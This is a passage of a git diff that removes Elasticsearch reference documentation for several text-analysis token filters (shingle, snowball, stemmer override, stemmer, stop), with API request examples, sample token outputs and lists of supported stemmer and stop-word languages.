"start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "xof", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "spmuj", - "start_offset" : 10, - "end_offset" : 15, - "type" : "", - "position" : 2 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-reverse-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`reverse` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT reverse_example -{ - "settings" : { - "analysis" : { - "analyzer" : { - "whitespace_reverse" : { - "tokenizer" : "whitespace", - "filter" : ["reverse"] - } - } - } - } -} --------------------------------------------------- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/shingle-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/shingle-tokenfilter.asciidoc deleted file mode 100644 index 0598fb32971..00000000000 --- a/docs/reference/analysis/tokenfilters/shingle-tokenfilter.asciidoc +++ /dev/null @@ -1,510 +0,0 @@ -[[analysis-shingle-tokenfilter]] -=== Shingle token filter -++++ -Shingle -++++ - -Add shingles, or word {wikipedia}/N-gram[n-grams], to a token -stream by concatenating adjacent tokens. By default, the `shingle` token filter -outputs two-word shingles and unigrams. - -For example, many tokenizers convert `the lazy dog` to `[ the, lazy, dog ]`. You -can use the `shingle` filter to add two-word shingles to this stream: -`[ the, the lazy, lazy, lazy dog, dog ]`. - -TIP: Shingles are often used to help speed up phrase queries, such as -<>. 
Rather than creating shingles -using the `shingles` filter, we recommend you use the -<> mapping parameter on the appropriate -<> field instead. - -This filter uses Lucene's -{lucene-analysis-docs}/shingle/ShingleFilter.html[ShingleFilter]. - -[[analysis-shingle-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `shingle` -filter to add two-word shingles to the token stream for `quick brown fox jumps`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ "shingle" ], - "text": "quick brown fox jumps" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ quick, quick brown, brown, brown fox, fox, fox jumps, jumps ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "quick brown", - "start_offset": 0, - "end_offset": 11, - "type": "shingle", - "position": 0, - "positionLength": 2 - }, - { - "token": "brown", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown fox", - "start_offset": 6, - "end_offset": 15, - "type": "shingle", - "position": 1, - "positionLength": 2 - }, - { - "token": "fox", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "fox jumps", - "start_offset": 12, - "end_offset": 21, - "type": "shingle", - "position": 2, - "positionLength": 2 - }, - { - "token": "jumps", - "start_offset": 16, - "end_offset": 21, - "type": "word", - "position": 3 - } - ] -} ----- -//// - -To produce shingles of 2-3 words, add the following arguments to the analyze API -request: - -* `min_shingle_size`: `2` -* `max_shingle_size`: `3` - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "shingle", - "min_shingle_size": 2, - "max_shingle_size": 3 - } - ], - "text": "quick brown fox jumps" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ quick, quick brown, quick brown fox, brown, brown fox, brown fox jumps, fox, fox jumps, jumps ] ----- - -//// -[source, console-result] ----- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "quick brown", - "start_offset": 0, - "end_offset": 11, - "type": "shingle", - "position": 0, - "positionLength": 2 - }, - { - "token": "quick brown fox", - "start_offset": 0, - "end_offset": 15, - "type": "shingle", - "position": 0, - "positionLength": 3 - }, - { - "token": "brown", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown fox", - "start_offset": 6, - "end_offset": 15, - "type": "shingle", - "position": 1, - "positionLength": 2 - }, - { - "token": "brown fox jumps", - "start_offset": 6, - "end_offset": 21, - "type": "shingle", - "position": 1, - "positionLength": 3 - }, - { - "token": "fox", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "fox jumps", - "start_offset": 12, - "end_offset": 21, - "type": "shingle", - "position": 2, - "positionLength": 2 - }, - { - "token": "jumps", - "start_offset": 16, - "end_offset": 21, - "type": "word", - "position": 3 - } - ] -} ----- -//// - -To only include shingles in the output, add an `output_unigrams` argument of -`false` to the request. 
- -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "shingle", - "min_shingle_size": 2, - "max_shingle_size": 3, - "output_unigrams": false - } - ], - "text": "quick brown fox jumps" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ quick brown, quick brown fox, brown fox, brown fox jumps, fox jumps ] ----- - -//// -[source, console-result] ----- -{ - "tokens": [ - { - "token": "quick brown", - "start_offset": 0, - "end_offset": 11, - "type": "shingle", - "position": 0 - }, - { - "token": "quick brown fox", - "start_offset": 0, - "end_offset": 15, - "type": "shingle", - "position": 0, - "positionLength": 2 - }, - { - "token": "brown fox", - "start_offset": 6, - "end_offset": 15, - "type": "shingle", - "position": 1 - }, - { - "token": "brown fox jumps", - "start_offset": 6, - "end_offset": 21, - "type": "shingle", - "position": 1, - "positionLength": 2 - }, - { - "token": "fox jumps", - "start_offset": 12, - "end_offset": 21, - "type": "shingle", - "position": 2 - } - ] -} ----- -//// - -[[analysis-shingle-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`shingle` filter to configure a new <>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "standard_shingle": { - "tokenizer": "standard", - "filter": [ "shingle" ] - } - } - } - } -} ----- - -[[analysis-shingle-tokenfilter-configure-parms]] -==== Configurable parameters - -`max_shingle_size`:: -(Optional, integer) -Maximum number of tokens to concatenate when creating shingles. Defaults to `2`. -+ -NOTE: This value cannot be lower than the `min_shingle_size` argument, which -defaults to `2`. The difference between this value and the `min_shingle_size` -argument cannot exceed the <> -index-level setting, which defaults to `3`. - -`min_shingle_size`:: -(Optional, integer) -Minimum number of tokens to concatenate when creating shingles. Defaults to `2`. -+ -NOTE: This value cannot exceed the `max_shingle_size` argument, which defaults -to `2`. The difference between the `max_shingle_size` argument and this value -cannot exceed the <> -index-level setting, which defaults to `3`. - -`output_unigrams`:: -(Optional, Boolean) -If `true`, the output includes the original input tokens. If `false`, the output -only includes shingles; the original input tokens are removed. Defaults to -`true`. - -`output_unigrams_if_no_shingles`:: -If `true`, the output includes the original input tokens only if no shingles are -produced; if shingles are produced, the output only includes shingles. Defaults -to `false`. -+ -IMPORTANT: If both this and the `output_unigrams` parameter are `true`, only the -`output_unigrams` argument is used. - -`token_separator`:: -(Optional, string) -Separator used to concatenate adjacent tokens to form a shingle. Defaults to a -space (`" "`). - -`filler_token`:: -+ --- -(Optional, string) -String used in shingles as a replacement for empty positions that do not contain -a token. This filler token is only used in shingles, not original unigrams. -Defaults to an underscore (`_`). - -Some token filters, such as the `stop` filter, create empty positions when -removing stop words with a position increment greater than one. - -.*Example* -[%collapsible] -==== -In the following <> request, the `stop` filter -removes the stop word `a` from `fox jumps a lazy dog`, creating an empty -position. 
The subsequent `shingle` filter replaces this empty position with a -plus sign (`+`) in shingles. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "stop", - "stopwords": [ "a" ] - }, - { - "type": "shingle", - "filler_token": "+" - } - ], - "text": "fox jumps a lazy dog" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ fox, fox jumps, jumps, jumps +, + lazy, lazy, lazy dog, dog ] ----- - -//// -[source, console-result] ----- -{ - "tokens" : [ - { - "token" : "fox", - "start_offset" : 0, - "end_offset" : 3, - "type" : "word", - "position" : 0 - }, - { - "token" : "fox jumps", - "start_offset" : 0, - "end_offset" : 9, - "type" : "shingle", - "position" : 0, - "positionLength" : 2 - }, - { - "token" : "jumps", - "start_offset" : 4, - "end_offset" : 9, - "type" : "word", - "position" : 1 - }, - { - "token" : "jumps +", - "start_offset" : 4, - "end_offset" : 12, - "type" : "shingle", - "position" : 1, - "positionLength" : 2 - }, - { - "token" : "+ lazy", - "start_offset" : 12, - "end_offset" : 16, - "type" : "shingle", - "position" : 2, - "positionLength" : 2 - }, - { - "token" : "lazy", - "start_offset" : 12, - "end_offset" : 16, - "type" : "word", - "position" : 3 - }, - { - "token" : "lazy dog", - "start_offset" : 12, - "end_offset" : 20, - "type" : "shingle", - "position" : 3, - "positionLength" : 2 - }, - { - "token" : "dog", - "start_offset" : 17, - "end_offset" : 20, - "type" : "word", - "position" : 4 - } - ] -} ----- -//// -==== --- - -[[analysis-shingle-tokenfilter-customize]] -==== Customize - -To customize the `shingle` filter, duplicate it to create the basis for a new -custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses a custom `shingle` filter, `my_shingle_filter`, to configure a new -<>. - -The `my_shingle_filter` filter uses a `min_shingle_size` of `2` and a -`max_shingle_size` of `5`, meaning it produces shingles of 2-5 words. -The filter also includes a `output_unigrams` argument of `false`, meaning that -only shingles are included in the output. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "en": { - "tokenizer": "standard", - "filter": [ "my_shingle_filter" ] - } - }, - "filter": { - "my_shingle_filter": { - "type": "shingle", - "min_shingle_size": 2, - "max_shingle_size": 5, - "output_unigrams": false - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/snowball-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/snowball-tokenfilter.asciidoc deleted file mode 100644 index a76bc6f6c52..00000000000 --- a/docs/reference/analysis/tokenfilters/snowball-tokenfilter.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[analysis-snowball-tokenfilter]] -=== Snowball token filter -++++ -Snowball -++++ - -A filter that stems words using a Snowball-generated stemmer. The -`language` parameter controls the stemmer with the following available -values: `Arabic`, `Armenian`, `Basque`, `Catalan`, `Danish`, `Dutch`, `English`, -`Estonian`, `Finnish`, `French`, `German`, `German2`, `Hungarian`, `Italian`, `Irish`, `Kp`, -`Lithuanian`, `Lovins`, `Norwegian`, `Porter`, `Portuguese`, `Romanian`, -`Russian`, `Spanish`, `Swedish`, `Turkish`. 
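-
-To experiment with one of these stemmers before adding it to an index, you can
-define a `snowball` filter inline in an analyze API request. The following is a
-minimal sketch: the `English` value and the sample text are only illustrative,
-and the response is omitted here.
-
-[source,console]
---------------------------------------------------
-GET /_analyze
-{
-  "tokenizer": "standard",
-  "filter": [
-    {
-      "type": "snowball",
-      "language": "English"
-    }
-  ],
-  "text": "stemming helps group related words"
-}
---------------------------------------------------
-
-To use a Snowball stemmer at index time, register it as a custom filter in the
-index settings.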
- -For example: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ "lowercase", "my_snow" ] - } - }, - "filter": { - "my_snow": { - "type": "snowball", - "language": "Lovins" - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/stemmer-override-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/stemmer-override-tokenfilter.asciidoc deleted file mode 100644 index 99cbe695f8f..00000000000 --- a/docs/reference/analysis/tokenfilters/stemmer-override-tokenfilter.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ -[[analysis-stemmer-override-tokenfilter]] -=== Stemmer override token filter -++++ -Stemmer override -++++ - -Overrides stemming algorithms, by applying a custom mapping, then -protecting these terms from being modified by stemmers. Must be placed -before any stemming filters. - -Rules are mappings in the form of `token1[, ..., tokenN] => override`. - -[cols="<,<",options="header",] -|======================================================================= -|Setting |Description -|`rules` |A list of mapping rules to use. - -|`rules_path` |A path (either relative to `config` location, or -absolute) to a list of mappings. -|======================================================================= - -Here is an example: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ "lowercase", "custom_stems", "porter_stem" ] - } - }, - "filter": { - "custom_stems": { - "type": "stemmer_override", - "rules_path": "analysis/stemmer_override.txt" - } - } - } - } -} --------------------------------------------------- - -Where the file looks like: - -[source,stemmer_override] --------------------------------------------------- -include::{es-test-dir}/cluster/config/analysis/stemmer_override.txt[] --------------------------------------------------- - -You can also define the overrides rules inline: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ "lowercase", "custom_stems", "porter_stem" ] - } - }, - "filter": { - "custom_stems": { - "type": "stemmer_override", - "rules": [ - "running, runs => run", - "stemmer => stemmer" - ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/stemmer-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/stemmer-tokenfilter.asciidoc deleted file mode 100644 index b88c5de0b81..00000000000 --- a/docs/reference/analysis/tokenfilters/stemmer-tokenfilter.asciidoc +++ /dev/null @@ -1,281 +0,0 @@ -[[analysis-stemmer-tokenfilter]] -=== Stemmer token filter -++++ -Stemmer -++++ - -Provides <> for several languages, -some with additional variants. For a list of supported languages, see the -<> parameter. - -When not customized, the filter uses the -https://snowballstem.org/algorithms/porter/stemmer.html[porter stemming -algorithm] for English. 
- -[[analysis-stemmer-tokenfilter-analyze-ex]] -==== Example - -The following analyze API request uses the `stemmer` filter's default porter -stemming algorithm to stem `the foxes jumping quickly` to `the fox jump -quickli`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ "stemmer" ], - "text": "the foxes jumping quickly" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ the, fox, jump, quickli ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "fox", - "start_offset": 4, - "end_offset": 9, - "type": "", - "position": 1 - }, - { - "token": "jump", - "start_offset": 10, - "end_offset": 17, - "type": "", - "position": 2 - }, - { - "token": "quickli", - "start_offset": 18, - "end_offset": 25, - "type": "", - "position": 3 - } - ] -} ----- -//// - -[[analysis-stemmer-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`stemmer` filter to configure a new <>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "whitespace", - "filter": [ "stemmer" ] - } - } - } - } -} ----- - -[role="child_attributes"] -[[analysis-stemmer-tokenfilter-configure-parms]] -==== Configurable parameters - -[[analysis-stemmer-tokenfilter-language-parm]] -`language`:: -(Optional, string) -Language-dependent stemming algorithm used to stem tokens. If both this and the -`name` parameter are specified, the `language` parameter argument is used. -+ -[%collapsible%open] -.Valid values for `language` -==== -Valid values are sorted by language. Defaults to -https://snowballstem.org/algorithms/porter/stemmer.html[*`english`*]. -Recommended algorithms are *bolded*. 
- -Arabic:: -{lucene-analysis-docs}/ar/ArabicStemmer.html[*`arabic`*] - -Armenian:: -https://snowballstem.org/algorithms/armenian/stemmer.html[*`armenian`*] - -Basque:: -https://snowballstem.org/algorithms/basque/stemmer.html[*`basque`*] - -Bengali:: -https://www.tandfonline.com/doi/abs/10.1080/02564602.1993.11437284[*`bengali`*] - -Brazilian Portuguese:: -{lucene-analysis-docs}/br/BrazilianStemmer.html[*`brazilian`*] - -Bulgarian:: -http://members.unine.ch/jacques.savoy/Papers/BUIR.pdf[*`bulgarian`*] - -Catalan:: -https://snowballstem.org/algorithms/catalan/stemmer.html[*`catalan`*] - -Czech:: -https://dl.acm.org/doi/10.1016/j.ipm.2009.06.001[*`czech`*] - -Danish:: -https://snowballstem.org/algorithms/danish/stemmer.html[*`danish`*] - -Dutch:: -https://snowballstem.org/algorithms/dutch/stemmer.html[*`dutch`*], -https://snowballstem.org/algorithms/kraaij_pohlmann/stemmer.html[`dutch_kp`] - -English:: -https://snowballstem.org/algorithms/porter/stemmer.html[*`english`*], -https://ciir.cs.umass.edu/pubfiles/ir-35.pdf[`light_english`], -https://snowballstem.org/algorithms/lovins/stemmer.html[`lovins`], -https://www.researchgate.net/publication/220433848_How_effective_is_suffixing[`minimal_english`], -https://snowballstem.org/algorithms/english/stemmer.html[`porter2`], -{lucene-analysis-docs}/en/EnglishPossessiveFilter.html[`possessive_english`] - -Estonian:: -https://lucene.apache.org/core/{lucene_version_path}/analyzers-common/org/tartarus/snowball/ext/EstonianStemmer.html[*`estonian`*] - -Finnish:: -https://snowballstem.org/algorithms/finnish/stemmer.html[*`finnish`*], -http://clef.isti.cnr.it/2003/WN_web/22.pdf[`light_finnish`] - -French:: -https://dl.acm.org/citation.cfm?id=1141523[*`light_french`*], -https://snowballstem.org/algorithms/french/stemmer.html[`french`], -https://dl.acm.org/citation.cfm?id=318984[`minimal_french`] - -Galician:: -http://bvg.udc.es/recursos_lingua/stemming.jsp[*`galician`*], -http://bvg.udc.es/recursos_lingua/stemming.jsp[`minimal_galician`] (Plural step only) - -German:: -https://dl.acm.org/citation.cfm?id=1141523[*`light_german`*], -https://snowballstem.org/algorithms/german/stemmer.html[`german`], -https://snowballstem.org/algorithms/german2/stemmer.html[`german2`], -http://members.unine.ch/jacques.savoy/clef/morpho.pdf[`minimal_german`] - -Greek:: -https://sais.se/mthprize/2007/ntais2007.pdf[*`greek`*] - -Hindi:: -http://computing.open.ac.uk/Sites/EACLSouthAsia/Papers/p6-Ramanathan.pdf[*`hindi`*] - -Hungarian:: -https://snowballstem.org/algorithms/hungarian/stemmer.html[*`hungarian`*], -https://dl.acm.org/citation.cfm?id=1141523&dl=ACM&coll=DL&CFID=179095584&CFTOKEN=80067181[`light_hungarian`] - -Indonesian:: -http://www.illc.uva.nl/Publications/ResearchReports/MoL-2003-02.text.pdf[*`indonesian`*] - -Irish:: -https://snowballstem.org/otherapps/oregan/[*`irish`*] - -Italian:: -https://www.ercim.eu/publication/ws-proceedings/CLEF2/savoy.pdf[*`light_italian`*], -https://snowballstem.org/algorithms/italian/stemmer.html[`italian`] - -Kurdish (Sorani):: -{lucene-analysis-docs}/ckb/SoraniStemmer.html[*`sorani`*] - -Latvian:: -{lucene-analysis-docs}/lv/LatvianStemmer.html[*`latvian`*] - -Lithuanian:: -https://svn.apache.org/viewvc/lucene/dev/branches/lucene_solr_5_3/lucene/analysis/common/src/java/org/apache/lucene/analysis/lt/stem_ISO_8859_1.sbl?view=markup[*`lithuanian`*] - -Norwegian (Bokmål):: -https://snowballstem.org/algorithms/norwegian/stemmer.html[*`norwegian`*], -{lucene-analysis-docs}/no/NorwegianLightStemmer.html[*`light_norwegian`*], 
-{lucene-analysis-docs}/no/NorwegianMinimalStemmer.html[`minimal_norwegian`] - -Norwegian (Nynorsk):: -{lucene-analysis-docs}/no/NorwegianLightStemmer.html[*`light_nynorsk`*], -{lucene-analysis-docs}/no/NorwegianMinimalStemmer.html[`minimal_nynorsk`] - -Portuguese:: -https://dl.acm.org/citation.cfm?id=1141523&dl=ACM&coll=DL&CFID=179095584&CFTOKEN=80067181[*`light_portuguese`*], -pass:macros[http://www.inf.ufrgs.br/~buriol/papers/Orengo_CLEF07.pdf[`minimal_portuguese`\]], -https://snowballstem.org/algorithms/portuguese/stemmer.html[`portuguese`], -https://www.inf.ufrgs.br/\~viviane/rslp/index.htm[`portuguese_rslp`] - -Romanian:: -https://snowballstem.org/algorithms/romanian/stemmer.html[*`romanian`*] - -Russian:: -https://snowballstem.org/algorithms/russian/stemmer.html[*`russian`*], -https://doc.rero.ch/lm.php?url=1000%2C43%2C4%2C20091209094227-CA%2FDolamic_Ljiljana_-_Indexing_and_Searching_Strategies_for_the_Russian_20091209.pdf[`light_russian`] - -Spanish:: -https://www.ercim.eu/publication/ws-proceedings/CLEF2/savoy.pdf[*`light_spanish`*], -https://snowballstem.org/algorithms/spanish/stemmer.html[`spanish`] - -Swedish:: -https://snowballstem.org/algorithms/swedish/stemmer.html[*`swedish`*], -http://clef.isti.cnr.it/2003/WN_web/22.pdf[`light_swedish`] - -Turkish:: -https://snowballstem.org/algorithms/turkish/stemmer.html[*`turkish`*] -==== - -`name`:: -An alias for the <> -parameter. If both this and the `language` parameter are specified, the -`language` parameter argument is used. - -[[analysis-stemmer-tokenfilter-customize]] -==== Customize - -To customize the `stemmer` filter, duplicate it to create the basis for a new -custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `stemmer` filter that stems -words using the `light_german` algorithm: - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "my_stemmer" - ] - } - }, - "filter": { - "my_stemmer": { - "type": "stemmer", - "language": "light_german" - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/stop-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/stop-tokenfilter.asciidoc deleted file mode 100644 index e3eef08efc9..00000000000 --- a/docs/reference/analysis/tokenfilters/stop-tokenfilter.asciidoc +++ /dev/null @@ -1,377 +0,0 @@ -[[analysis-stop-tokenfilter]] -=== Stop token filter -++++ -Stop -++++ - -Removes {wikipedia}/Stop_words[stop words] from a token -stream. - -When not customized, the filter removes the following English stop words by -default: - -`a`, `an`, `and`, `are`, `as`, `at`, `be`, `but`, `by`, `for`, `if`, `in`, -`into`, `is`, `it`, `no`, `not`, `of`, `on`, `or`, `such`, `that`, `the`, -`their`, `then`, `there`, `these`, `they`, `this`, `to`, `was`, `will`, `with` - -In addition to English, the `stop` filter supports predefined -<>. You can also specify your own stop words as an array or file. - -The `stop` filter uses Lucene's -https://lucene.apache.org/core/{lucene_version_path}/core/org/apache/lucene/analysis/StopFilter.html[StopFilter]. 
- -[[analysis-stop-tokenfilter-analyze-ex]] -==== Example - -The following analyze API request uses the `stop` filter to remove the stop words -`a` and `the` from `a quick fox jumps over the lazy dog`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ "stop" ], - "text": "a quick fox jumps over the lazy dog" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ quick, fox, jumps, over, lazy, dog ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 2, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "fox", - "start_offset": 8, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "jumps", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "over", - "start_offset": 18, - "end_offset": 22, - "type": "", - "position": 4 - }, - { - "token": "lazy", - "start_offset": 27, - "end_offset": 31, - "type": "", - "position": 6 - }, - { - "token": "dog", - "start_offset": 32, - "end_offset": 35, - "type": "", - "position": 7 - } - ] -} ----- -//// - -[[analysis-stop-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the `stop` -filter to configure a new <>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "whitespace", - "filter": [ "stop" ] - } - } - } - } -} ----- - -[[analysis-stop-tokenfilter-configure-parms]] -==== Configurable parameters - -`stopwords`:: -+ --- -(Optional, string or array of strings) -Language value, such as `_arabic_` or `_thai_`. Defaults to -<>. - -Each language value corresponds to a predefined list of stop words in Lucene. -See <> for supported language -values and their stop words. - -Also accepts an array of stop words. - -For an empty list of stop words, use `_none_`. --- - -`stopwords_path`:: -+ --- -(Optional, string) -Path to a file that contains a list of stop words to remove. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each stop word in the file must be separated by a line -break. --- - -`ignore_case`:: -(Optional, Boolean) -If `true`, stop word matching is case insensitive. For example, if `true`, a -stop word of `the` matches and removes `The`, `THE`, or `the`. Defaults to -`false`. - -`remove_trailing`:: -+ --- -(Optional, Boolean) -If `true`, the last token of a stream is removed if it's a stop word. Defaults -to `true`. - -This parameter should be `false` when using the filter with a -<>. This would ensure a query like -`green a` matches and suggests `green apple` while still removing other stop -words. --- - -[[analysis-stop-tokenfilter-customize]] -==== Customize - -To customize the `stop` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom case-insensitive `stop` -filter that removes stop words from the <> stop -words list: - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "tokenizer": "whitespace", - "filter": [ "my_custom_stop_words_filter" ] - } - }, - "filter": { - "my_custom_stop_words_filter": { - "type": "stop", - "ignore_case": true - } - } - } - } -} ----- - -You can also specify your own list of stop words. 
For example, the following -request creates a custom case-sensitive `stop` filter that removes only the stop -words `and`, `is`, and `the`: - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "tokenizer": "whitespace", - "filter": [ "my_custom_stop_words_filter" ] - } - }, - "filter": { - "my_custom_stop_words_filter": { - "type": "stop", - "ignore_case": true, - "stopwords": [ "and", "is", "the" ] - } - } - } - } -} ----- - -[[analysis-stop-tokenfilter-stop-words-by-lang]] -==== Stop words by language - -The following list contains supported language values for the `stopwords` -parameter and a link to their predefined stop words in Lucene. - -[[arabic-stop-words]] -`_arabic_`:: -{lucene-stop-word-link}/ar/stopwords.txt[Arabic stop words] - -[[armenian-stop-words]] -`_armenian_`:: -{lucene-stop-word-link}/hy/stopwords.txt[Armenian stop words] - -[[basque-stop-words]] -`_basque_`:: -{lucene-stop-word-link}/eu/stopwords.txt[Basque stop words] - -[[bengali-stop-words]] -`_bengali_`:: -{lucene-stop-word-link}/bn/stopwords.txt[Bengali stop words] - -[[brazilian-stop-words]] -`_brazilian_` (Brazilian Portuguese):: -{lucene-stop-word-link}/br/stopwords.txt[Brazilian Portuguese stop words] - -[[bulgarian-stop-words]] -`_bulgarian_`:: -{lucene-stop-word-link}/bg/stopwords.txt[Bulgarian stop words] - -[[catalan-stop-words]] -`_catalan_`:: -{lucene-stop-word-link}/ca/stopwords.txt[Catalan stop words] - -[[cjk-stop-words]] -`_cjk_` (Chinese, Japanese, and Korean):: -{lucene-stop-word-link}/cjk/stopwords.txt[CJK stop words] - -[[czech-stop-words]] -`_czech_`:: -{lucene-stop-word-link}/cz/stopwords.txt[Czech stop words] - -[[danish-stop-words]] -`_danish_`:: -{lucene-stop-word-link}/snowball/danish_stop.txt[Danish stop words] - -[[dutch-stop-words]] -`_dutch_`:: -{lucene-stop-word-link}/snowball/dutch_stop.txt[Dutch stop words] - -[[english-stop-words]] -`_english_`:: -https://github.com/apache/lucene-solr/blob/master/lucene/analysis/common/src/java/org/apache/lucene/analysis/en/EnglishAnalyzer.java#L46[English stop words] - -[[estonian-stop-words]] -`_estonian_`:: -https://github.com/apache/lucene-solr/blob/master/lucene/analysis/common/src/resources/org/apache/lucene/analysis/et/stopwords.txt[Estonian stop words] - -[[finnish-stop-words]] -`_finnish_`:: -{lucene-stop-word-link}/snowball/finnish_stop.txt[Finnish stop words] - -[[french-stop-words]] -`_french_`:: -{lucene-stop-word-link}/snowball/french_stop.txt[French stop words] - -[[galician-stop-words]] -`_galician_`:: -{lucene-stop-word-link}/gl/stopwords.txt[Galician stop words] - -[[german-stop-words]] -`_german_`:: -{lucene-stop-word-link}/snowball/german_stop.txt[German stop words] - -[[greek-stop-words]] -`_greek_`:: -{lucene-stop-word-link}/el/stopwords.txt[Greek stop words] - -[[hindi-stop-words]] -`_hindi_`:: -{lucene-stop-word-link}/hi/stopwords.txt[Hindi stop words] - -[[hungarian-stop-words]] -`_hungarian_`:: -{lucene-stop-word-link}/snowball/hungarian_stop.txt[Hungarian stop words] - -[[indonesian-stop-words]] -`_indonesian_`:: -{lucene-stop-word-link}/id/stopwords.txt[Indonesian stop words] - -[[irish-stop-words]] -`_irish_`:: -{lucene-stop-word-link}/ga/stopwords.txt[Irish stop words] - -[[italian-stop-words]] -`_italian_`:: -{lucene-stop-word-link}/snowball/italian_stop.txt[Italian stop words] - -[[latvian-stop-words]] -`_latvian_`:: -{lucene-stop-word-link}/lv/stopwords.txt[Latvian stop words] - -[[lithuanian-stop-words]] -`_lithuanian_`:: 
-{lucene-stop-word-link}/lt/stopwords.txt[Lithuanian stop words] - -[[norwegian-stop-words]] -`_norwegian_`:: -{lucene-stop-word-link}/snowball/norwegian_stop.txt[Norwegian stop words] - -[[persian-stop-words]] -`_persian_`:: -{lucene-stop-word-link}/fa/stopwords.txt[Persian stop words] - -[[portuguese-stop-words]] -`_portuguese_`:: -{lucene-stop-word-link}/snowball/portuguese_stop.txt[Portuguese stop words] - -[[romanian-stop-words]] -`_romanian_`:: -{lucene-stop-word-link}/ro/stopwords.txt[Romanian stop words] - -[[russian-stop-words]] -`_russian_`:: -{lucene-stop-word-link}/snowball/russian_stop.txt[Russian stop words] - -[[sorani-stop-words]] -`_sorani_`:: -{lucene-stop-word-link}/ckb/stopwords.txt[Sorani stop words] - -[[spanish-stop-words]] -`_spanish_`:: -{lucene-stop-word-link}/snowball/spanish_stop.txt[Spanish stop words] - -[[swedish-stop-words]] -`_swedish_`:: -{lucene-stop-word-link}/snowball/swedish_stop.txt[Swedish stop words] - -[[thai-stop-words]] -`_thai_`:: -{lucene-stop-word-link}/th/stopwords.txt[Thai stop words] - -[[turkish-stop-words]] -`_turkish_`:: -{lucene-stop-word-link}/tr/stopwords.txt[Turkish stop words] \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/synonym-graph-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/synonym-graph-tokenfilter.asciidoc deleted file mode 100644 index bc288fbf720..00000000000 --- 